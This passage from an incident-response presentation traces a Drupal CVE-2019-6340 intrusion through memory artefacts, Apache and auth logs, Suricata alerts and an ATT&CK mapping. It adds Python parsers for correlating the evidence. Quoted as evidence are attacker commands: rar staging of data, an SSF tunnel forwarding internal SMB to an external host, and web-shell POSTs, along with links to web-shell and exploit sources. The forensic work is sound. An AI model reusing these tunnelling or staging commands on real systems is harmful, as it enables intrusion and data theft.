![Page 66](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/66.jpg)
Memory Forensics
An advanced memory forensics framework: github.com/volatilityfoundation/volatility
![Page 67](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/67.jpg)
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services\share" -pY23QyJCj%kak
\WINDOWS\system32\cmd.exe - r.exe "C:\Documents and Settings\Administrator\Application Data\services\share.rar" -hp23QyJCj%kAK
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services" -pY23QyJCj%kAK
Adminisystem32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services\share.rar" -pY23QyJCj%kak
C:\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services" -pY23QyJCj%kAKkAAK*5
![Page 68](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/68.jpg)
40 00 ? 06 ? ? 0A 00 ? ? 0A 00 B9 68 ? ? 01 bd
IP flags: Don't Fragment (40 00)
Skip TTL
Proto: TCP - 6
Skip header checksum
Src address: 10.0.*.*
Dst address: 10.0.185.104
Any source port
SMB port: 445
RFC 791 - Internet Protocol: tools.ietf.org/html/rfc791#section-3.1
Assigned Internet Protocol Numbers: www.iana.org/assignments/protocol-numbers/protocol-numbers.xml
![Page 69](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/69.jpg)
CyberChef Recipe: gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Decimal('Space',false)&input=NDAgMDAgNDAgMDYgNzAgMjcgMEEgMDAgQjkgNjkgMEEgMDAgQjkgNjggQTYgMDQgMDEgQkQ
![Page 70](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/70.jpg)
![Page 71](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/71.jpg)
./auth.log.2.gz:Mar 27 23:04:37 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html/ssf/ssf-linux-x86_64-3.0.0 ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./auth.log.2.gz:Apr 10 14:21:52 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] connecting to <54.165.150.118:80>
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] running (Ctrl + C to stop)
-rwxrwx--- 1 root vboxsf 353 Mar 27 2019 ./var/www/html/ssf/ssf-linux-x86_64-3.0.0/config.json
-rwxrwx--- 1 root vboxsf 80K Mar 27 2019 ./var/www/html/sites/default/modules/connect.php
-rwxrwx--- 1 root vboxsf 353 Mar 27 2019 ./var/www/html/config.json
-rwxrwx--- 1 root vboxsf 80K Mar 27 2019 ./var/www/html/connect.php
Secure Socket Funneling: securesocketfunneling.github.io/ssf/#home
![Page 72](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/72.jpg)
WebShell wso-4.2.5: github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php
![Page 73](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/73.jpg)
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"

Count  Date
77     28/Mar/2019
50     10/Apr/2019
42     26/Mar/2019
35     27/Mar/2019

Count  IP
96     18.222.249.59
64     77.243.191.35
43     31.44.93.2
1      103.244.3.7
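The three slides above line up into one chain: POSTs to the wso web shell connect.php from 77.243.191.35, a sudo attempt by www-data at the same second that fails (www-data is not in sudoers) but records the command, an SSF client told to expose port 445 on 54.165.150.118 and forward it through the web server to 10.0.185.104:445 (the internal Windows host from the memory pattern), and the SSF client's own output landing in Apache's error.log because the web shell's child inherited the server's stderr. The script below is an added example, not from the slides or from SSF: it parses both log formats, pairs each sudo attempt by the web account with the POST that arrived just before it, decodes the -R forward, and reproduces the per-IP and per-day counts. The samples are constructed from the slide's lines; the year and +0300 offset for syslog lines, the ssf option handling and the extra access-log line from a second client are assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed samples modelled on the slides' excerpts (the grep prefixes such
# as ./auth.log.2.gz: are stripped; a fifth access-log line from another client
# is added for contrast). Syslog lines carry no year or zone, so the year and
# the +0300 offset of the Apache log are assumed below.
AUTH_LOG = """\
Mar 27 23:04:37 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html/ssf/ssf-linux-x86_64-3.0.0 ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
Apr 10 14:21:52 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
"""
UA = '"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"'
ACCESS_LOG = "\n".join([
    f'77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588 {UA}',
    f'77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842 {UA}',
    f'77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588 {UA}',
    f'77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838 {UA}',
    '18.222.249.59 - - [28/Mar/2019:10:11:12 +0300] "GET /index.php HTTP/1.1" 200 1234 "-" "curl/7.58.0"',
])

_ACCESS = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')
_SUDO = re.compile(r'^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sudo: +(?P<user>\S+) : (?:(?P<msg>[^;]+?) ; )?TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$')
LOCAL_TZ = timezone(timedelta(hours=3))  # assumed from the Apache timestamps
YEAR = 2019                               # assumed: syslog omits the year


def parse_access(lines):
    out = []
    for line in lines:
        m = _ACCESS.match(line)
        if m:
            out.append({"ip": m["ip"], "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                        "method": m["method"], "path": m["path"], "status": int(m["status"])})
    return out


def parse_ssf(cmd):
    """Pull the server endpoint and -R/-L forwards out of an ssf client
    command line ([bind_addr:]bind_port:dest_host:dest_port). Assumes the
    only value-taking options present are -R, -L and -p."""
    toks = cmd.split()
    info = {"binary": toks[0], "server": None, "server_port": None, "forwards": []}
    i = 1
    while i < len(toks):
        t = toks[i]
        if t in ("-R", "-L") and i + 1 < len(toks):
            parts = toks[i + 1].split(":")
            bind_addr = parts[0] if len(parts) == 4 else "*"
            info["forwards"].append({"kind": "remote" if t == "-R" else "local",
                                     "bind": f"{bind_addr}:{parts[-3]}",
                                     "dest": f"{parts[-2]}:{parts[-1]}"})
            i += 2
        elif t == "-p" and i + 1 < len(toks):
            info["server_port"] = int(toks[i + 1])
            i += 2
        elif t.startswith("-"):
            i += 1  # flags without a value, e.g. -g (gateway ports)
        else:
            info["server"] = t
            i += 1
    return info


def correlate(access_lines, auth_lines, window=5, web_user="www-data"):
    """Pair each sudo attempt by the web server account with the POST requests
    that arrived in the `window` seconds before it: that request is the one
    whose body drove the web shell."""
    posts = [r for r in parse_access(access_lines) if r["method"] == "POST"]
    pairs = []
    for line in auth_lines:
        m = _SUDO.match(line)
        if not m or m["user"] != web_user:
            continue
        when = datetime.strptime(f'{m["ts"]} {YEAR}', "%b %d %H:%M:%S %Y").replace(tzinfo=LOCAL_TZ)
        near = [(p["ip"], p["path"]) for p in posts if 0 <= (when - p["time"]).total_seconds() <= window]
        pairs.append({"when": when.isoformat(), "pwd": m["pwd"], "cmd": m["cmd"],
                      "ssf": parse_ssf(m["cmd"]) if "ssf" in m["cmd"] else None,
                      "webshell_posts": near})
    return pairs


def summarize(access_lines):
    """The slide's two pivot tables: hits per client IP and per day."""
    by_ip, by_day = Counter(), Counter()
    for r in parse_access(access_lines):
        by_ip[r["ip"]] += 1
        by_day[r["time"].strftime("%d/%b/%Y")] += 1
    return by_ip, by_day
```

The failed sudo is the lucky part: it logged the full command line that the web shell would otherwise have executed silently, and the working directory (PWD) tells you where the SSF binary and its config.json were dropped.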
![Page 74](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/74.jpg)
![Page 75](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/75.jpg)
![Page 76](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/76.jpg)
![Page 77](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/77.jpg)
CVE-2019-6340
Exploit Drupal8's REST RCE
Open PT ESC ruleset: https://github.com/ptresearch/AttackDetection/blob/master/CVE-2019-6340/cve-2019-6340.rules
EXPLOITING DRUPAL8'S REST RCE: https://www.ambionics.io/blog/drupal8-rce
REST Module Remote Code Execution: https://www.exploit-db.com/exploits/46459
![Page 78](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/78.jpg)
03/27/2019-21:32:06.083219 [**] [1:10003494:2] TOOLS [PTsecurity] PHP Object Deserialization RCE POP Chain (Guzzle/RCE1) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80
03/27/2019-21:32:06.083219 [**] [1:10004555:3] ATTACK [PTsecurity] Arbitrary PHP RCE in Drupal 8 < 8.5.11,8.6.10 (CVE-2019-6340) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80
Bitly | URL Shortener: https://bitly.com/2UbQmhT+
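The two fast.log lines above are what place the Drupal exploitation on the timeline: 21:32:06 on 27 March, from 54.165.150.118 (the same host the SSF client later connected back to) to the web server 192.70.197.230:80, with the CVE in the rule message. The parser below is an added example, not from the slides or from Suricata: it turns fast.log lines into records with parsed timestamps, sid/rev, classification, endpoints and any CVE identifiers, and produces the sorted rows and per-source counts that go into the timeline next to the host-side events. The third sample alert is constructed for contrast; its sid and message are invented.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample: the two alerts from the slide plus a third, lower
# priority line made up for contrast (its sid and message are invented).
FAST_LOG = """\
03/27/2019-21:32:06.083219  [**] [1:10003494:2] TOOLS [PTsecurity] PHP Object Deserialization RCE POP Chain (Guzzle/RCE1) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80
03/27/2019-21:32:06.083219  [**] [1:10004555:3] ATTACK [PTsecurity] Arbitrary PHP RCE in Drupal 8 < 8.5.11,8.6.10 (CVE-2019-6340) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -> 192.70.197.230:80
03/28/2019-10:11:12.000000  [**] [1:9000001:1] CONSTRUCTED example scan alert [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 31.44.93.2:41000 -> 192.70.197.230:80
"""

_ALERT = re.compile(
    r'^(?P<ts>\d\d/\d\d/\d{4}-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\] '
    r'\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.*?) \[\*\*\] '
    r'\[Classification: (?P<cls>[^\]]*)\] \[Priority: (?P<pri>\d+)\] '
    r'\{(?P<proto>\w+)\} (?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+)$')


def parse_fast_log(text):
    alerts = []
    for line in text.splitlines():
        m = _ALERT.match(line)
        if not m:
            continue
        alerts.append({
            "time": datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
            "sid": int(m["sid"]), "rev": int(m["rev"]), "msg": m["msg"],
            "classification": m["cls"], "priority": int(m["pri"]),
            "proto": m["proto"], "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
            "cves": re.findall(r"CVE-\d{4}-\d{4,}", m["msg"]),
        })
    return alerts


def timeline(alerts, max_priority=1):
    """Alerts at or above the given priority (1 is highest) as sorted
    (time, source, destination, summary) rows ready to merge with host events."""
    rows = [(a["time"].isoformat(sep=" ", timespec="seconds"),
             f'{a["src"]}:{a["sport"]}', f'{a["dst"]}:{a["dport"]}',
             f'[{a["sid"]}] {a["msg"]}')
            for a in alerts if a["priority"] <= max_priority]
    return sorted(rows)


def sources_by_priority(alerts, max_priority=1):
    return Counter(a["src"] for a in alerts if a["priority"] <= max_priority)
```

fast.log timestamps are in the sensor's local time with no zone, so convert them before merging with the +0300 Apache entries and the UTC Windows event log.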
![Page 79](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/79.jpg)
ATT&CK Matrix
Initial Access: Exploit Public-Facing Application
Execution: Command-Line Interface, PowerShell, Regsvr32, Scripting, Service Execution
Persistence: Registry Run Keys / Startup Folder, Web Shell
Privilege Escalation: Web Shell
Defense Evasion: Clear Command History, Deobfuscate/Decode Files or Information, File Deletion, File Permissions Modification, Hidden Files and Directories, Masquerading, Network Share Connection Removal, Obfuscated Files or Information, DLL Side-Loading, Scripting, Timestomp
Credential Access: Credential Dumping, Password Filter DLL, Network Sniffing
Discovery: Account Discovery, File and Directory Discovery, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery, Process Discovery, Query Registry, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery
Lateral Movement: Pass the Hash, Remote Desktop Protocol, Remote File Copy, Windows Admin Shares
Collection: Clipboard Data, Input Capture, Screen Capture, Video Capture
Exfiltration: Data Compressed
Command and Control: Commonly Used Port, Connection Proxy, Data Encoding, Data Obfuscation, Multilayer Encryption, Remote Access Tools, Remote File Copy, Standard Application Layer Protocol, Standard Cryptographic Protocol
Impact: Data Destruction, Disk Content Wipe, Stored Data Manipulation
ATT&CK Matrix for Enterprise: https://attack.mitre.org/
![Page 80](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/80.jpg)
Analysis: timeline
![Page 81](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/81.jpg)
Analysis: results
• Investigating in breadth and in depth,
• Performing both dynamic and static analysis,
• Keeping the traffic,
• Decrypting the traffic,
• Drawing logical links between the data,
• Identifying other attack vectors,
• Finding the initial vector,
• Correlating the artefacts found,
• Filling the gaps in the timeline,
• Understanding the logic behind the actions
![Page 82](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/82.jpg)
Questions
![Page 83](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/83.jpg)
Questions
Useful links
PT ESC Threat Intelligence blog: ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/
PT ESC Incident Response Alert: ptsecurity.com/ru-ru/services/esc/
Calypso APT: a new group attacking government institutions: ptsecurity.com/upload/corporate/ww-en/analytics/calypso-apt-2019-eng.pdf
Operation TaskMasters: cyber-espionage in the era of the digital economy: ptsecurity.com/upload/corporate/ww-en/analytics/Operation-Taskmasters-2019-eng.pdf
![Page 84](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/84.jpg)
ptsecurity.com
Thank you for your attention!